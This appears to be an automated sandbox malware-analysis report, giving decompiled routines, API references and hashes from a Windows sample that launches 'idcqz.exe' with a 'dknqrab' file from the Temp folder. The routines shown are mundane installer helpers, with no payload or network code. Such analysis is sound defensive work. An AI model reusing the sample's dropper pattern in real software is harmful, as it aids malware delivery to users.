          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
          • String ID:
          • API String ID: 1849352358-0
          • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
          • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
          • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
          • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 73%
          			E00401E4E(intOrPtr __edx) {
          				void* __edi;
          				int _t9;
          				signed char _t15;
          				struct HFONT__* _t18;
          				intOrPtr _t30;
          				void* _t31;
          				struct HDC__* _t33;
          				void* _t35;
          
          				_t30 = __edx;
          				_t33 = GetDC( *(_t35 - 8));
          				_t9 = E00402D84(2);
          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
          				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
          				ReleaseDC( *(_t35 - 8), _t33);
          				 *0x40ce08 = E00402D84(3);
          				_t15 =  *((intOrPtr*)(_t35 - 0x20));
          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
          				 *0x40ce0f = 1;
          				 *0x40ce0c = _t15 & 0x00000001;
          				 *0x40ce0d = _t15 & 0x00000002;
          				 *0x40ce0e = _t15 & 0x00000004;
          				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
          				_t18 = CreateFontIndirectW(0x40cdf8);
          				_push(_t18);
          				_push(_t31);
          				E004065B5();
          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
          				return 0;
          			}











          0x00401e4e
          0x00401e59
          0x00401e5b
          0x00401e68
          0x00401e7f
          0x00401e84
          0x00401e91
          0x00401e96
          0x00401e9a
          0x00401ea5
          0x00401eac
          0x00401ebe
          0x00401ec4
          0x00401ec9
          0x00401ed3
          0x00402638
          0x0040156d
          0x00402ba4
          0x00402c2d
          0x00402c39

          APIs
          • GetDC.USER32(?), ref: 00401E51
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
          • MulDiv.KERNEL32 ref: 00401E73
          • ReleaseDC.USER32(?,00000000), ref: 00401E84
            • Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
            • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
          • String ID:
          • API String ID: 2584051700-0
          • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
          • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
          • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
          • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 59%
          			E00401C43(intOrPtr __edx) {
          				int _t29;
          				long _t30;
          				signed int _t32;
          				WCHAR* _t35;
          				long _t36;
          				int _t41;
          				signed int _t42;
          				int _t46;
          				int _t56;
          				intOrPtr _t57;
          				struct HWND__* _t63;
          				void* _t64;
          
          				_t57 = __edx;
          				_t29 = E00402D84(3);
          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
          				 *(_t64 - 0x18) = _t29;
          				_t30 = E00402D84(4);
          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
          				 *(_t64 + 8) = _t30;
          				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
          					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
          				}
          				__eflags =  *(_t64 - 0x1c) & 0x00000002;
          				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
          					 *(_t64 + 8) = E00402DA6(0x44);
          				}
          				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
          				_push(1);
          				if(__eflags != 0) {
          					_t61 = E00402DA6();
          					_t32 = E00402DA6();
          					asm("sbb ecx, ecx");
          					asm("sbb eax, eax");
          					_t35 =  ~( *_t31) & _t61;
          					__eflags = _t35;
          					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
          					goto L10;
          				} else {
          					_t63 = E00402D84();
          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
          					_t41 = E00402D84(2);
          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
          					_t56 =  *(_t64 - 0x1c) >> 2;
          					if(__eflags == 0) {
          						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
          						L10:
          						 *(_t64 - 0x38) = _t36;
          					} else {
          						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
          						asm("sbb eax, eax");
          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
          					}
          				}
          				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
          				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
          					_push( *(_t64 - 0x38));
          					E004065B5();
          				}
          				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
          				return 0;
          			}















          0x00401c43
          0x00401c45
          0x00401c4c
          0x00401c4f
          0x00401c52
          0x00401c5c
          0x00401c60
          0x00401c63
          0x00401c6c
          0x00401c6c
          0x00401c6f
          0x00401c73
          0x00401c7c
          0x00401c7c
          0x00401c7f
          0x00401c83
          0x00401c85
          0x00401cda
          0x00401cdc
          0x00401ce7
          0x00401cf1
          0x00401cf4
          0x00401cf4
          0x00401cfd
          0x00000000
          0x00401c87
          0x00401c8e
          0x00401c90
          0x00401c93
          0x00401c99
          0x00401ca0
          0x00401ca3
          0x00401ccb
          0x00401d03
          0x00401d03
          0x00401ca5
          0x00401cb3
          0x00401cbb
          0x00401cbe
          0x00401cbe
          0x00401ca3
          0x00401d06
          0x00401d09
          0x00401d0f
          0x00402ba4
          0x00402ba4
          0x00402c2d
          0x00402c39

          APIs
          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: MessageSend$Timeout
          • String ID: !
          • API String ID: 1777923405-2657877971
          • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
          • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
          • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
          • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 77%
          			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
          				char _v68;
          				char _v132;
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				signed int _t23;
          				signed int _t24;
          				void* _t31;
          				void* _t33;
          				void* _t34;
          				void* _t44;
          				signed int _t46;
          				signed int _t50;
          				signed int _t52;
          				signed int _t53;
          				signed int _t55;
          
          				_t23 = _a16;
          				_t53 = _a12;
          				_t44 = 0xffffffdc;
          				if(_t23 == 0) {
          					_push(0x14);
          					_pop(0);
          					_t24 = _t53;
          					if(_t53 < 0x100000) {
          						_push(0xa);
          						_pop(0);
          						_t44 = 0xffffffdd;
          					}
          					if(_t53 < 0x400) {
          						_t44 = 0xffffffde;
          					}
          					if(_t53 < 0xffff3333) {
          						_t52 = 0x14;
          						asm("cdq");
          						_t24 = 1 / _t52 + _t53;
          					}
          					_t25 = _t24 & 0x00ffffff;
          					_t55 = _t24 >> 0;
          					_t46 = 0xa;
          					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
          				} else {
          					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
          					_t50 = 0;
          				}
          				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
          				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
          				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
          				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
          				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
          			}



















          0x00404e80
          0x00404e85
          0x00404e8d
          0x00404e8e
          0x00404e9b
          0x00404ea3
          0x00404ea4
          0x00404ea6
          0x00404ea8
          0x00404eaa
          0x00404ead
          0x00404ead
          0x00404eb4
          0x00404eba
          0x00404eba
          0x00404ec1
          0x00404ec8
          0x00404ecb
          0x00404ece
          0x00404ece
          0x00404ed2
          0x00404ee2
          0x00404ee4
          0x00404ee7
          0x00404e90
          0x00404e90
          0x00404e97
          0x00404e97
          0x00404eef
          0x00404efa
          0x00404f10
          0x00404f21
          0x00404f3d

          APIs
          • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
          • wsprintfW.USER32 ref: 00404F21
          • SetDlgItemTextW.USER32 ref: 00404F34
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: ItemTextlstrlenwsprintf
          • String ID: %u.%u%s%s
          • API String ID: 3540041739-3551169577
          • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
          • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
          • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
          • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E00405F3D(WCHAR* _a4) {
          				WCHAR* _t9;
          
          				_t9 = _a4;
          				_push( &(_t9[lstrlenW(_t9)]));
          				_push(_t9);
          				if( *(CharPrevW()) != 0x5c) {
          					lstrcatW(_t9, 0x40a014);
          				}
          				return _t9;
          			}




          0x00405f3e
          0x00405f4b
          0x00405f4c
          0x00405f57
          0x00405f5f
          0x00405f5f
          0x00405f67

          APIs
          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
          • CharPrevW.USER32(?,00000000), ref: 00405F4D
          • lstrcatW.KERNEL32 ref: 00405F5F
          Strings
          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CharPrevlstrcatlstrlen
          • String ID: C:\Users\user\AppData\Local\Temp\
          • API String ID: 2659869361-4017390910
          • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
          • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
          • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
          • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 89%
          			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
          				int _t15;
          				long _t16;
          
          				_t15 = _a8;
          				if(_t15 != 0x102) {
          					if(_t15 != 0x200) {
          						_t16 = _a16;
          						L7:
          						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
          							_push(_t16);
          							_push(6);
          							 *0x7a1f74 = _t16;
          							E00405005();
          						}
          						L11:
          						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
          					}
          					if(IsWindowVisible(_a4) == 0) {
          						L10:
          						_t16 = _a16;
          						goto L11;
          					}
          					_t16 = E00404F85(_a4, 1);
          					_t15 = 0x419;
          					goto L7;
          				}
          				if(_a12 != 0x20) {
          					goto L10;
          				}
          				E00404616(0x413);
          				return 0;
          			}





          0x00405648
          0x00405652
          0x0040566e
          0x00405690
          0x00405693
          0x00405699
          0x004056a3
          0x004056a4
          0x004056a6
          0x004056ac
          0x004056ac
          0x004056b6
          0x00000000
          0x004056c4
          0x0040567b
          0x004056b3
          0x004056b3
          0x00000000
          0x004056b3
          0x00405687
          0x00405689
          0x00000000
          0x00405689
          0x00405658
          0x00000000
          0x00000000
          0x0040565f
          0x00000000

          APIs
          • IsWindowVisible.USER32(?), ref: 00405673
          • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
            • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Window$CallMessageProcSendVisible
          • String ID:
          • API String ID: 3748168415-3916222277
          • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
          • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
          • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
          • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 90%
          			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
          				int _v8;
          				long _t21;
          				long _t24;
          				char* _t30;
          
          				asm("sbb eax, eax");
          				_v8 = 0x800;
          				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
          				_t30 = _a16;
          				if(_t21 != 0) {
          					L4:
          					 *_t30 =  *_t30 & 0x00000000;
          				} else {
          					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
          					_t21 = RegCloseKey(_a20);
          					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
          						goto L4;
          					}
          				}
          				return _t21;
          			}







          0x0040654a
          0x0040654c
          0x00406564
          0x00406569
          0x0040656e
          0x004065ac
          0x004065ac
          0x00406570
          0x00406582
          0x0040658d
          0x00406593
          0x0040659e
          0x00000000
          0x00000000
          0x0040659e
          0x004065b2

          APIs
          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406582
          • RegCloseKey.ADVAPI32(?), ref: 0040658D
          Strings
          • C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab, xrefs: 00406543
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CloseQueryValue
          • String ID: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
          • API String ID: 3356406503-2166095966
          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
          • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
          • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
          				int _v8;
          				int _t12;
          				int _t14;
          				int _t15;
          				CHAR* _t17;
          				CHAR* _t27;
          
          				_t12 = lstrlenA(_a8);
          				_t27 = _a4;
          				_v8 = _t12;
          				while(lstrlenA(_t27) >= _v8) {
          					_t14 = _v8;
          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
          					_t15 = lstrcmpiA(_t27, _a8);
          					_t27[_v8] =  *(_t14 + _t27);
          					if(_t15 == 0) {
          						_t17 = _t27;
          					} else {
          						_t27 = CharNextA(_t27);
          						continue;
          					}
          					L5:
          					return _t17;
          				}
          				_t17 = 0;
          				goto L5;
          			}









          0x004060d3
          0x004060d5
          0x004060d8
          0x00406104
          0x004060dd
          0x004060e6
          0x004060eb
          0x004060f6
          0x004060f9
          0x00406115
          0x004060fb
          0x00406102
          0x00000000
          0x00406102
          0x0040610e
          0x00406112
          0x00406112
          0x0040610c
          0x00000000

          APIs
          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
          • CharNextA.USER32(00000000), ref: 004060FC
          • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: lstrlen$CharNextlstrcmpi
          • String ID:
          • API String ID: 190613189-0
          • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
          • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
          • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
          • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
          Uniqueness

          Uniqueness Score: -1.00%

          Execution Graph

          Execution Coverage:9.4%
          Dynamic/Decrypted Code Coverage:4.6%
          Signature Coverage:8.9%
          Total number of Nodes:1724
          Total number of Limit Nodes:109
          execution_graph 7843 b51737 7846 b53ec8 7843->7846 7845 b5173c 7845->7845 7847 b53ef8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7846->7847 7848 b53eeb 7846->7848 7849 b53eef 7847->7849 7848->7847 7848->7849 7849->7845 7850 b51f37 7857 b558ce 7850->7857 7853 b51f4a 7855 b54831 _free 58 API calls 7853->7855 7856 b51f55 7855->7856 7870 b558d7 7857->7870 7859 b51f3c 7859->7853 7860 b55787 7859->7860 7861 b55793 __freefls@4 7860->7861 7862 b5442f __lock 58 API calls 7861->7862 7863 b5579f 7862->7863 7864 b55804 7863->7864 7868 b557d8 DeleteCriticalSection 7863->7868 7887 b57c39 7863->7887 7900 b5581b 7864->7900 7866 b55810 __freefls@4 7866->7853 7869 b54831 _free 58 API calls 7868->7869 7869->7863 7871 b558e3 __freefls@4 7870->7871 7872 b5442f __lock 58 API calls 7871->7872 7878 b558f2 7872->7878 7873 b55990 7883 b559b2 7873->7883 7875 b51f9d _flsall 59 API calls 7875->7878 7876 b5599c __freefls@4 7876->7859 7878->7873 7878->7875 7879 b55824 82 API calls __fflush_nolock 7878->7879 7880 b5597f 7878->7880 7879->7878 7881 b52007 __getstream 2 API calls 7880->7881 7882 b5598d 7881->7882 7882->7878 7886 b54599 LeaveCriticalSection 7883->7886 7885 b559b9 7885->7876 7886->7885 7888 b57c45 __freefls@4 7887->7888 7889 b57c59 7888->7889 7891 b57c71 7888->7891 7890 b51cc3 __cftof_l 58 API calls 7889->7890 7892 b57c5e 7890->7892 7893 b57c69 __freefls@4 7891->7893 7894 b51f5e __lock_file 59 API calls 7891->7894 7895 b51e89 __cftof_l 9 API calls 7892->7895 7893->7863 7896 b57c83 7894->7896 7895->7893 7903 b57bcd 7896->7903 7962 b54599 